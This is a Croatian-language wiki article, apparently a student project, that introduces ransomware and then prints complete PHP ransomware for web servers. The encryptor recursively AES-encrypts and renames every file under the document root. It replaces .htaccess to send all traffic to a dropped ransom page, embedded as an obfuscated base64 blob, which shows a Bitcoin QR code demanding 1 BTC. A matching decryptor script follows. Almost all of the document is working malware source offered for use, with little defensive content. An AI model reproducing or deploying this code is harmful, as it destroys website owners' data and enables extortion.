Ransomware za bazu podataka
Izvor: SIS Wiki
Izradio: Ivan Šincek
Sadržaj |
Uvod
Ransomware je tip malicioznog programskog koda iz područja kriptovirologije koji prijeti korisnicima i poduzećima da će javno objaviti njihove osjetljive podatke ili da će nastaviti blokirati pristup istim podacima ako nije tražena otkupnina plaćena. Dok amaterski ransomware u većini slučajeva zabrani pristup podacima, a kojeg je vrlo lako povratiti, napredni malware koristi tehnike poput kriptoviralne iznude, gdje se svaka datoteka kriptira posebno, pri čemu ona postaje beskorisna, te zahtijeva otkupninu da se one povrate u prvobitni oblik. U kvalitetno dizajniranom kriptoviralnom napadu iznude, vraćanje podataka u prvobitni oblik bez ključa za dešifriranje je gotovo nemoguće – isto tako u napadu se koriste digitalne valute poput Ukash-a i Bitcoin-a za plaćanje otkupnine, pri čemu je gotovo nemoguće uči u trag napadačima.
Pokretanje malicioznog koda
Ransomware napadi se najčešće prenose u obliku trojanskog konja, pri čemu se maliciozni kod prikazuje korisniku kao legitima datoteka koju korisnik preuzme na prijevaru ili neki trik te pokrene. Najčešći medij prijenosa je email. Međutim napredni ransomware-i mogu biti i ukomponirani u druge maliciozne kodove poput crva (npr. "WannaCry") te mogu putovati samostalno kroz mrežu bez interakcije korisnika.
U ovom projektu maliciozni kod ransomware-a nalazi se unutar jedne PHP datoteke koja se može na razne načine prenijeti na server, a njeno izvršenje je ručno, što znači da korisnik mora sam posjetiti tu PHP skriptu kako bi se maliciozni kod izvršio.
Maliciozni kod
Izvršavanje enkripcije i dekripcije provodi se tako da se skeniraju svi direktoriji, odnosno datoteke, unutar samo root direktorija poslužitelja rekurzivno. Postupak enkripcije je takav da se čita sadržaj datoteke i preko matematičkog algoritma izračunava kriptirani (nerazumljivi) sadržaj na temelju učitanog razumljivog sadržaja. Nakon enkripcije sadržaja preimenuje se naziv datoteke nasumično generiranim nizom znakova, a pravo ime datoteke se zapiše unutar samog kriptografskog sadržaja kako bi se kasnije moglo povratiti. Postupak dekripcije je sličan kao i postupak enkripcije, učitava se nerazumljiv sadržaj te se obrnutim matematičkim postupkom iz nerazumljivog sadržaja izračunava razumljiv (prvobitan) sadržaj. Te se ime datoteke preimenuje stvarnim imenom pohranjenim unutar kriptografskog sadržaja.
Prilikom kriptiranja, ako unutar root direktorija poslužitelja postoji .htaccess datoteka ona se kriptira i preimenuje, te se stvara vlastita maliciozna .htaccess datoteka koja sav promet preusmjerava na novo generiranu datoteku "get_rekt.php" koja služi za dekripciju i sadrži sve potrebne podatke o plaćanju otkupnine. Nakon uspješnog plaćanja otkupnine, odnosno unosa ispravnog ključa za dešifriranje, maliciozna .htaccesss datoteke zajedno s datotekom za dekripciju se briše te se vraća prvobitna .htaccess datoteka, a zatim i sve ostale datoteke.
Ransomware enkripcija
<?php
class RansomwareEncrypt {
private function htaccessEncrypt() {
if (file_exists($_SERVER['DOCUMENT_ROOT'] . DIRECTORY_SEPARATOR . '.htaccess')) {
rename($_SERVER['DOCUMENT_ROOT'] . DIRECTORY_SEPARATOR . '.htaccess', $_SERVER['DOCUMENT_ROOT'] . DIRECTORY_SEPARATOR . '.get_rekt');
}
file_put_contents(
$_SERVER['DOCUMENT_ROOT'] . DIRECTORY_SEPARATOR . 'get_rekt.php',
base64_decode('
PD9waHANCmNsYXNzIFJhbnNvbXdhcmVEZWNyeXB0IHsNCglwcml2YXRlIGZ1bmN0aW9uIGh0YWNj
ZXNzRGVjcnlwdCgpIHsNCgkJdW5saW5rKCRfU0VSVkVSWydET0NVTUVOVF9ST09UJ10gLiBESVJF
Q1RPUllfU0VQQVJBVE9SIC4gJy5odGFjY2VzcycpOw0KCQl1bmxpbmsoJF9TRVJWRVJbJ0RPQ1VN
RU5UX1JPT1QnXSAuIERJUkVDVE9SWV9TRVBBUkFUT1IgLiAnZ2V0X3Jla3QucGhwJyk7DQoJCWlm
IChmaWxlX2V4aXN0cygkX1NFUlZFUlsnRE9DVU1FTlRfUk9PVCddIC4gRElSRUNUT1JZX1NFUEFS
QVRPUiAuICcuZ2V0X3Jla3QnKSkgew0KCQkJcmVuYW1lKCRfU0VSVkVSWydET0NVTUVOVF9ST09U
J10gLiBESVJFQ1RPUllfU0VQQVJBVE9SIC4gJy5nZXRfcmVrdCcsICRfU0VSVkVSWydET0NVTUVO
VF9ST09UJ10gLiBESVJFQ1RPUllfU0VQQVJBVE9SIC4gJy5odGFjY2VzcycpOw0KCQl9DQoJfQ0K
CXByaXZhdGUgZnVuY3Rpb24gZGVjcnlwdEZpbGUoJGZpbGUsICRrZXkpIHsNCgkJaWYgKCRmaWxl
ICE9ICRfU0VSVkVSWydET0NVTUVOVF9ST09UJ10gLiBESVJFQ1RPUllfU0VQQVJBVE9SIC4gJy5o
dGFjY2VzcycgJiYgJGZpbGUgIT0gJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXSAuIERJUkVDVE9S
WV9TRVBBUkFUT1IgLiAnZ2V0X3Jla3QucGhwJykgew0KCQkJJHRleHQgPSBiYXNlNjRfZGVjb2Rl
KGZpbGVfZ2V0X2NvbnRlbnRzKCRmaWxlKSk7DQoJCQkka2V5ID0gaGFzaCgnc2hhMjU2JywgJGtl
eSk7DQoJCQkkaXYgPSBzdWJzdHIoaGFzaCgnc2hhMjU2JywgJGtleSksIDAsIDE2KTsNCgkJCSRk
ZWNyeXB0ZWRUZXh0ID0gb3BlbnNzbF9kZWNyeXB0KCR0ZXh0LCAnQUVTLTI1Ni1DQkMnLCAka2V5
LCAwLCAkaXYpOw0KCQkJJHBvc2l0aW9uID0gc3RycG9zKCRkZWNyeXB0ZWRUZXh0LCAnPGZpbGVO
YW1lPicpOw0KCQkJJGZpbGVOYW1lID0gc3Vic3RyKCRkZWNyeXB0ZWRUZXh0LCAwLCAkcG9zaXRp
b24pOw0KCQkJJGRlY3J5cHRlZFRleHQgPSBzdWJzdHIoJGRlY3J5cHRlZFRleHQsICRwb3NpdGlv
biArIHN0cmxlbignPGZpbGVOYW1lPicpKTsNCgkJCWZpbGVfcHV0X2NvbnRlbnRzKCRmaWxlLCAk
ZGVjcnlwdGVkVGV4dCk7DQoJCQlyZW5hbWUoJGZpbGUsICRmaWxlTmFtZSk7DQoJCX0NCgl9DQog
ICAgc3RhdGljIGZ1bmN0aW9uIGRlY3J5cHQoJGRpciwgJGtleSwgJGh0YWNjZXNzID0gZmFsc2Up
IHsNCgkJJGZpbGVzID0gYXJyYXlfZGlmZihzY2FuZGlyKCRkaXIpLCBhcnJheSgnLicsICcuLicp
KTsNCgkJZm9yZWFjaCAoJGZpbGVzIGFzICRmaWxlKSB7DQoJCQlpZiAoaXNfZGlyKCRkaXIgLiBE
SVJFQ1RPUllfU0VQQVJBVE9SIC4gJGZpbGUpKSB7DQoJCQkJc2VsZjo6ZGVjcnlwdCgkZGlyIC4g
RElSRUNUT1JZX1NFUEFSQVRPUiAuICRmaWxlLCAka2V5KTsNCgkJCX0gZWxzZSB7DQoJCQkJc2Vs
Zjo6ZGVjcnlwdEZpbGUoJGRpciAuIERJUkVDVE9SWV9TRVBBUkFUT1IgLiAkZmlsZSwgJGtleSk7
DQoJCQl9DQoJCX0NCgkJaWYgKCRodGFjY2Vzcykgew0KCQkJc2VsZjo6aHRhY2Nlc3NEZWNyeXB0
KCk7DQoJCX0NCiAgICB9DQp9DQokZXJyb3JNZXNzYWdlcyA9IGFycmF5KA0KCSdrZXknID0+ICcn
DQopOw0KaWYgKGlzc2V0KCRfU0VSVkVSWydSRVFVRVNUX01FVEhPRCddKSAmJiBzdHJ0b2xvd2Vy
KCRfU0VSVkVSWydSRVFVRVNUX01FVEhPRCddKSA9PT0gJ3Bvc3QnKSB7DQogICAgaWYgKGlzc2V0
KCRfUE9TVFsnc3VibWl0J10pICYmIGlzc2V0KCRfUE9TVFsna2V5J10pKSB7DQoJCSRwYXJhbWV0
ZXJzID0gYXJyYXkoDQoJCQkna2V5JyA9PiB0cmltKCRfUE9TVFsna2V5J10pDQoJCSk7DQoJCSRl
cnJvciA9IGZhbHNlOw0KICAgICAgICBpZiAobWJfc3RybGVuKCRwYXJhbWV0ZXJzWydrZXknXSkg
PCAxKSB7DQogICAgICAgICAgICAkZXJyb3JNZXNzYWdlc1sna2V5J10gPSAnUGxlYXNlIGVudGVy
IGRlY3J5cHRpb24ga2V5JzsNCiAgICAgICAgICAgICRlcnJvciA9IHRydWU7DQogICAgICAgIH0N
CgkJaWYgKCEkZXJyb3IpIHsNCgkJCVJhbnNvbXdhcmVEZWNyeXB0OjpkZWNyeXB0KCRfU0VSVkVS
WydET0NVTUVOVF9ST09UJ10sICRwYXJhbWV0ZXJzWydrZXknXSwgdHJ1ZSk7DQoJCQloZWFkZXIo
J0xvY2F0aW9uOiAvJyk7DQoJCQlleGl0KCk7DQoJCX0NCgl9DQp9DQo/Pg0KPCFET0NUWVBFIGh0
bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQoJPGhlYWQ+DQoJCTxtZXRhIGNoYXJzZXQ9IlVURi04Ij4N
CgkJPHRpdGxlPlJhbnNvbXdhcmU8L3RpdGxlPg0KCQk8bWV0YSBuYW1lPSJkZXNjcmlwdGlvbiIg
Y29udGVudD0iIj4NCgkJPG1ldGEgbmFtZT0ia2V5d29yZHMiIGNvbnRlbnQ9IiI+DQoJCTxtZXRh
IG5hbWU9ImF1dGhvciIgY29udGVudD0iSXZhbiDFoGluY2VrIj4NCgkJPG1ldGEgbmFtZT0idmll
d3BvcnQiIGNvbnRlbnQ9IndpZHRoPWRldmljZS13aWR0aCwgaW5pdGlhbC1zY2FsZT0xLjAiPg0K
CQk8c3R5bGU+DQoJCQlodG1sIHsNCgkJCQloZWlnaHQ6IDEwMCU7DQoJCQl9DQoJCQlib2R5IHsN
CgkJCQliYWNrZ3JvdW5kLWNvbG9yOiAjMjYyNjI2Ow0KCQkJCWRpc3BsYXk6IGZsZXg7DQoJCQkJ
ZmxleC1kaXJlY3Rpb246IGNvbHVtbjsNCgkJCQloZWlnaHQ6IGluaGVyaXQ7DQoJCQkJbWFyZ2lu
OiAwOw0KCQkJCWNvbG9yOiAjRkZGOw0KCQkJCWZvbnQtZmFtaWx5OiBBcmlhbCwgSGVsdmV0aWNh
LCBzYW5zLXNlcmlmOw0KCQkJCWZvbnQtc2l6ZTogMWVtOw0KCQkJCWZvbnQtd2VpZ2h0OiA0MDA7
DQoJCQkJdGV4dC1hbGlnbjogbGVmdDsNCgkJCX0NCgkJCS5mb3JtIHsNCgkJCQlkaXNwbGF5OiBm
bGV4Ow0KCQkJCWZsZXgtZGlyZWN0aW9uOiBjb2x1bW47DQoJCQkJYWxpZ24taXRlbXM6IGNlbnRl
cjsNCgkJCQlqdXN0aWZ5LWNvbnRlbnQ6IGNlbnRlcjsNCgkJCQlmbGV4OiAxIDAgYXV0bzsNCgkJ
CQlwYWRkaW5nOiAuNWVtOw0KCQkJfQ0KCQkJLmZvcm0gLmxheW91dCB7DQoJCQkJYmFja2dyb3Vu
ZC1jb2xvcjogI0RDRENEQzsNCgkJCQlwYWRkaW5nOiAxLjVlbTsNCgkJCQl3aWR0aDogMjRlbTsN
CgkJCQljb2xvcjogIzAwMDsNCgkJCQlib3JkZXI6IC4wN2VtIHNvbGlkICMwMDA7DQoJCQl9DQoJ
CQkuZm9ybSAubGF5b3V0IGhlYWRlciBoMSB7DQoJCQkJbWFyZ2luOiAwIDAgLjVlbSAwOw0KCQkJ
CWZvbnQtc2l6ZTogMi42ZW07DQoJCQkJZm9udC13ZWlnaHQ6IDQwMDsNCgkJCQl0ZXh0LWFsaWdu
OiBjZW50ZXI7DQoJCQl9DQoJCQkuZm9ybSAubGF5b3V0IGZvcm0gew0KCQkJCWRpc3BsYXk6IGZs
ZXg7DQoJCQkJZmxleC1kaXJlY3Rpb246IGNvbHVtbjsNCgkJCX0NCgkJCS5mb3JtIC5sYXlvdXQg
Zm9ybSBsYWJlbCB7DQoJCQkJbWFyZ2luOiAwIDAgLjFlbTsNCgkJCX0NCgkJCS5mb3JtIC5sYXlv
dXQgZm9ybSBpbnB1dCB7DQoJCQkJLXdlYmtpdC1hcHBlYXJhbmNlOiBub25lOw0KCQkJCW1hcmdp
bjogMDsNCgkJCQlwYWRkaW5nOiAuMmVtIC40ZW07DQoJCQkJZm9udC1mYW1pbHk6ICdBcm1hdGEn
LCBzYW5zLXNlcmlmOw0KCQkJCWZvbnQtc2l6ZTogMWVtOw0KCQkJCWJvcmRlcjogLjA3ZW0gc29s
aWQgIzlEMkEwMDsNCgkJCQktd2Via2l0LWJvcmRlci1yYWRpdXM6IDA7DQoJCQl9DQoJCQkuZm9y
bSAubGF5b3V0IGZvcm0gaW5wdXRbdHlwZT0ic3VibWl0Il0gew0KCQkJCWJhY2tncm91bmQtY29s
b3I6ICNGRjQ1MDA7DQoJCQkJY29sb3I6ICNGRkY7DQoJCQkJY3Vyc29yOiBwb2ludGVyOw0KCQkJ
CXRyYW5zaXRpb246IGJhY2tncm91bmQtY29sb3IgMjIwbXMgbGluZWFyOw0KCQkJfQ0KCQkJLmZv
cm0gLmxheW91dCBmb3JtIGlucHV0W3R5cGU9InN1Ym1pdCJdOmhvdmVyIHsNCgkJCQliYWNrZ3Jv
dW5kLWNvbG9yOiAjRDgzQTAwOw0KCQkJCXRyYW5zaXRpb246IGJhY2tncm91bmQtY29sb3IgMjIw
bXMgbGluZWFyOw0KCQkJfQ0KCQkJLmZvcm0gLmxheW91dCBmb3JtIC5lcnJvciB7DQoJCQkJbWFy
Z2luOiAwIDAgMWVtOw0KCQkJCWNvbG9yOiAjOUQyQTAwOw0KCQkJCWZvbnQtc2l6ZTogLjhlbTsN
CgkJCX0NCgkJCS5mb3JtIC5sYXlvdXQgZm9ybSAuZXJyb3I6bm90KDplbXB0eSkgew0KCQkJCW1h
cmdpbjogLjJlbSAwIDFlbTsNCgkJCX0NCgkJCS5mb3JtIC5wYXkgew0KCQkJCWJhY2tncm91bmQt
Y29sb3I6IHJnYmEoMCwgMCwgMCwgLjcpOw0KCQkJCWRpc3BsYXk6IGZsZXg7DQoJCQkJZmxleC1k
aXJlY3Rpb246IGNvbHVtbjsNCgkJCQlhbGlnbi1pdGVtczogY2VudGVyOw0KCQkJCXBvc2l0aW9u
OiBhYnNvbHV0ZTsNCgkJCQlib3R0b206IDA7DQoJCQkJbGVmdDogMDsNCgkJCQlwYWRkaW5nOiAu
MmVtOw0KCQkJCXdpZHRoOiAyMjVweDsNCgkJCX0NCgkJCS5mb3JtIC5wYXkgaW1nIHsNCgkJCQlt
YXJnaW46IDAgMCAuMmVtOw0KCQkJCXdpZHRoOiBpbmhlcml0Ow0KCQkJfQ0KCQkJLmZvcm0gLnBh
eSBwIHsNCgkJCQltYXJnaW46IDA7DQoJCQkJY29sb3I6ICNGRkY7DQoJCQl9DQoJCTwvc3R5bGU+
DQoJPC9oZWFkPg0KCTxib2R5Pg0KCQk8ZGl2IGNsYXNzPSJmb3JtIj4NCgkJCTxkaXYgY2xhc3M9
InBheSI+DQoJCQkJPGltZyBzcmM9Imh0dHBzOi8vY2hhcnQuZ29vZ2xlYXBpcy5jb20vY2hhcnQ/
Y2hzPTIyNXgyMjUmY2hsZD1MfDImY2h0PXFyJmNobD1iaXRjb2luOjFCclpNNlQ3RzlSTjh2YmFi
bmZYdTRNNkxwZ3p0cTZZMTQ/YW1vdW50PTEiIGFsdD0iMUJyWk02VDdHOVJOOHZiYWJuZlh1NE02
THBnenRxNlkxNCI+DQoJCQkJPHAgaHJlZj0iIj5QYXkgMSBCVEMhPC9wPg0KCQkJPC9kaXY+DQoJ
CQk8ZGl2IGNsYXNzPSJsYXlvdXQiPg0KCQkJCTxoZWFkZXI+DQoJCQkJCTxoMT5SYW5zb213YXJl
PC9oMT4NCgkJCQk8L2hlYWRlcj4NCgkJCQk8Zm9ybSBtZXRob2Q9InBvc3QiIGFjdGlvbj0iIj4N
CgkJCQkJPGxhYmVsIGZvcj0icGFzc3dvcmQiPkRlY3J5cHRpb24gS2V5PC9sYWJlbD4NCgkJCQkJ
PGlucHV0IG5hbWU9ImtleSIgaWQ9ImtleSIgdHlwZT0idGV4dCIgc3BlbGxjaGVjaz0iZmFsc2Ui
IGF1dG9mb2N1cz0iYXV0b2ZvY3VzIj4NCgkJCQkJPHAgY2xhc3M9ImVycm9yIj48P3BocCBlY2hv
ICRlcnJvck1lc3NhZ2VzWydrZXknXTsgPz48L3A+DQoJCQkJCTxpbnB1dCBuYW1lPSJzdWJtaXQi
IHR5cGU9InN1Ym1pdCIgdmFsdWU9IkRlY3J5cHQiPg0KCQkJCTwvZm9ybT4NCgkJCTwvZGl2Pg0K
CQk8L2Rpdj4NCgk8L2JvZHk+DQo8L2h0bWw+
')
);
file_put_contents($_SERVER['DOCUMENT_ROOT'] . DIRECTORY_SEPARATOR . '.htaccess', "DirectoryIndex get_rekt.php\nErrorDocument 404 get_rekt.php");
}
private function encryptFile($file, $key) {
if ($file != $_SERVER['DOCUMENT_ROOT'] . DIRECTORY_SEPARATOR . '.htaccess' && $file != $_SERVER['DOCUMENT_ROOT'] . DIRECTORY_SEPARATOR . 'get_rekt.php') {
$text = file_get_contents($file);
$key = hash('sha256', $key);
$iv = substr(hash('sha256', $key), 0, 16);
$encryptedText = base64_encode((openssl_encrypt($file . '<fileName>' . $text, 'AES-256-CBC', $key, 0, $iv)));
file_put_contents($file, $encryptedText);
rename($file, pathinfo($file)['dirname'] . DIRECTORY_SEPARATOR . substr($encryptedText, 0, 128) . substr($encryptedText, 0, 3));
}
}
static function encrypt($dir, $key, $htaccess = false) {
if ($htaccess) {
self::htaccessEncrypt();
}
$files = array_diff(scandir($dir), array('.', '..'));
foreach ($files as $file) {
if (is_dir($dir . DIRECTORY_SEPARATOR . $file)) {
self::encrypt($dir . DIRECTORY_SEPARATOR . $file, $key);
} else {
self::encryptFile($dir . DIRECTORY_SEPARATOR . $file, $key);
}
}
}
}
$errorMessages = array(
'key' => ''
);
if (isset($_SERVER['REQUEST_METHOD']) && strtolower($_SERVER['REQUEST_METHOD']) === 'post') {
if (isset($_POST['submit']) && isset($_POST['key'])) {
$parameters = array(
'key' => trim($_POST['key'])
);
$error = false;
if (mb_strlen($parameters['key']) < 1) {
$errorMessages['key'] = 'Please enter encryption key';
$error = true;
}
if (!$error) {
RansomwareEncrypt::encrypt($_SERVER['DOCUMENT_ROOT'], $parameters['key'], true);
header('Location: /');
exit();
}
}
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Ransomware</title>
<meta name="description" content="">
<meta name="keywords" content="">
<meta name="author" content="Ivan Šincek">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<style>
html {
height: 100%;
}
body {
background-color: #262626;
display: flex;
flex-direction: column;
height: inherit;
margin: 0;
color: #FFF;
font-family: Arial, Helvetica, sans-serif;
font-size: 1em;
font-weight: 400;
text-align: left;
}
.form {
display: flex;
flex-direction: column;
align-items: center;
justify-content: center;
flex: 1 0 auto;
padding: .5em;
}
.form .layout {
background-color: #DCDCDC;
padding: 1.5em;
width: 24em;
color: #000;
border: .07em solid #000;
}
.form .layout header h1 {
margin: 0 0 .5em 0;
font-size: 2.6em;
font-weight: 400;
text-align: center;
}
.form .layout form {
display: flex;
flex-direction: column;
}
.form .layout form label {
margin: 0 0 .1em;
}
.form .layout form input {
-webkit-appearance: none;
margin: 0;
padding: .2em .4em;
font-family: 'Armata', sans-serif;
font-size: 1em;
border: .07em solid #9D2A00;
-webkit-border-radius: 0;
}
.form .layout form input[type="submit"] {
background-color: #FF4500;
color: #FFF;
cursor: pointer;
transition: background-color 220ms linear;
}
.form .layout form input[type="submit"]:hover {
background-color: #D83A00;
transition: background-color 220ms linear;
}
.form .layout form .error {
margin: 0 0 1em;
color: #9D2A00;
font-size: .8em;
}
.form .layout form .error:not(:empty) {
margin: .2em 0 1em;
}
</style>
</head>
<body>
<div class="form">
<div class="layout">
<header>
<h1>Ransomware</h1>
</header>
<form method="post" action="">
<label for="password">Encryption Key</label>
<input name="key" id="key" type="text" spellcheck="false" autofocus="autofocus">
<p class="error"><?php echo $errorMessages['key']; ?></p>
<input name="submit" type="submit" value="Encrypt">
</form>
</div>
</div>
</body>
</html>
Ransomware dekripcija
<?php
class RansomwareDecrypt {
private function htaccessDecrypt() {
unlink($_SERVER['DOCUMENT_ROOT'] . DIRECTORY_SEPARATOR . '.htaccess');
unlink($_SERVER['DOCUMENT_ROOT'] . DIRECTORY_SEPARATOR . 'get_rekt.php');
if (file_exists($_SERVER['DOCUMENT_ROOT'] . DIRECTORY_SEPARATOR . '.get_rekt')) {
rename($_SERVER['DOCUMENT_ROOT'] . DIRECTORY_SEPARATOR . '.get_rekt', $_SERVER['DOCUMENT_ROOT'] . DIRECTORY_SEPARATOR . '.htaccess');
}
}
private function decryptFile($file, $key) {
if ($file != $_SERVER['DOCUMENT_ROOT'] . DIRECTORY_SEPARATOR . '.htaccess' && $file != $_SERVER['DOCUMENT_ROOT'] . DIRECTORY_SEPARATOR . 'get_rekt.php') {
$text = base64_decode(file_get_contents($file));
$key = hash('sha256', $key);
$iv = substr(hash('sha256', $key), 0, 16);
$decryptedText = openssl_decrypt($text, 'AES-256-CBC', $key, 0, $iv);
$position = strpos($decryptedText, '<fileName>');
$fileName = substr($decryptedText, 0, $position);
$decryptedText = substr($decryptedText, $position + strlen('<fileName>'));
file_put_contents($file, $decryptedText);
rename($file, $fileName);
}
}
static function decrypt($dir, $key, $htaccess = false) {
$files = array_diff(scandir($dir), array('.', '..'));
foreach ($files as $file) {
if (is_dir($dir . DIRECTORY_SEPARATOR . $file)) {
self::decrypt($dir . DIRECTORY_SEPARATOR . $file, $key);
} else {
self::decryptFile($dir . DIRECTORY_SEPARATOR . $file, $key);
}
}
if ($htaccess) {
self::htaccessDecrypt();
}
}
}
$errorMessages = array(
'key' => ''
);
if (isset($_SERVER['REQUEST_METHOD']) && strtolower($_SERVER['REQUEST_METHOD']) === 'post') {
if (isset($_POST['submit']) && isset($_POST['key'])) {
$parameters = array(
'key' => trim($_POST['key'])
);
$error = false;
if (mb_strlen($parameters['key']) < 1) {
$errorMessages['key'] = 'Please enter decryption key';
$error = true;
}
if (!$error) {
RansomwareDecrypt::decrypt($_SERVER['DOCUMENT_ROOT'], $parameters['key'], true);
header('Location: /');
exit();
}
}
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Ransomware</title>
<meta name="description" content="">
<meta name="keywords" content="">
<meta name="author" content="Ivan Šincek">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<style>
html {
height: 100%;
}
body {
background-color: #262626;
display: flex;
flex-direction: column;
height: inherit;
margin: 0;
color: #FFF;
font-family: Arial, Helvetica, sans-serif;
font-size: 1em;
font-weight: 400;
text-align: left;
}
.form {
display: flex;
flex-direction: column;
align-items: center;
justify-content: center;
flex: 1 0 auto;
padding: .5em;
}
.form .layout {
background-color: #DCDCDC;
padding: 1.5em;
width: 24em;
color: #000;
border: .07em solid #000;
}
.form .layout header h1 {
margin: 0 0 .5em 0;
font-size: 2.6em;
font-weight: 400;
text-align: center;
}
.form .layout form {
display: flex;
flex-direction: column;
}
.form .layout form label {
margin: 0 0 .1em;
}
.form .layout form input {
-webkit-appearance: none;
margin: 0;
padding: .2em .4em;
font-family: 'Armata', sans-serif;
font-size: 1em;
border: .07em solid #9D2A00;
-webkit-border-radius: 0;
}
.form .layout form input[type="submit"] {
background-color: #FF4500;
color: #FFF;
cursor: pointer;
transition: background-color 220ms linear;
}
.form .layout form input[type="submit"]:hover {
background-color: #D83A00;
transition: background-color 220ms linear;
}
.form .layout form .error {
margin: 0 0 1em;
color: #9D2A00;
font-size: .8em;
}
.form .layout form .error:not(:empty) {
margin: .2em 0 1em;
}
.form .pay {
background-color: rgba(0, 0, 0, .7);
display: flex;
flex-direction: column;
align-items: center;
position: absolute;
bottom: 0;
left: 0;
padding: .2em;
width: 225px;
}
.form .pay img {
margin: 0 0 .2em;
width: inherit;
}
.form .pay p {
margin: 0;
color: #FFF;
}
</style>
</head>
<body>
<div class="form">
<div class="pay">
<img src="https://chart.googleapis.com/chart?chs=225x225&chld=L|2&cht=qr&chl=bitcoin:1BrZM6T7G9RN8vbabnfXu4M6Lpgztq6Y14?amount=1" alt="1BrZM6T7G9RN8vbabnfXu4M6Lpgztq6Y14">
<p href="">Pay 1 BTC!</p>
</div>
<div class="layout">
<header>
<h1>Ransomware</h1>
</header>
<form method="post" action="">
<label for="password">Decryption Key</label>
<input name="key" id="key" type="text" spellcheck="false" autofocus="autofocus">
<p class="error"><?php echo $errorMessages['key']; ?></p>
<input name="submit" type="submit" value="Decrypt">
</form>
</div>
</div>
</body>
</html>
Literatura
Ransomware. Dostupno 24.1.2018. s https://en.wikipedia.org/wiki/Ransomware.
